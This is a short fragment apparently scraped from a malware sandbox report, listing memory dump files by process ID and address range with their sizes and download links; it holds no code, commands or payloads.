memory/888-78-0x0000000001F80000-0x0000000002BCA000-memory.dmp

Filesize
12.3MB

Download
memory/1516-71-0x0000000000D00000-0x0000000000D08000-memory.dmp

Filesize
32KB

Download
memory/1516-80-0x000000001B190000-0x000000001B192000-memory.dmp

Filesize
8KB

Download
memory/1516-81-0x0000000000380000-0x000000000038A000-memory.dmp

Filesize
40KB

Download
memory/1868-74-0x0000000001F11000-0x0000000001F12000-memory.dmp

Filesize
4KB

Download
memory/1868-77-0x0000000001F12000-0x0000000001F14000-memory.dmp

Filesize
8KB

Download
memory/1868-73-0x0000000001F10000-0x0000000001F11000-memory.dmp

Filesize
4KB

Download
memory/2024-55-0x0000000075DF1000-0x0000000075DF3000-memory.dmp

Filesize
8KB

Download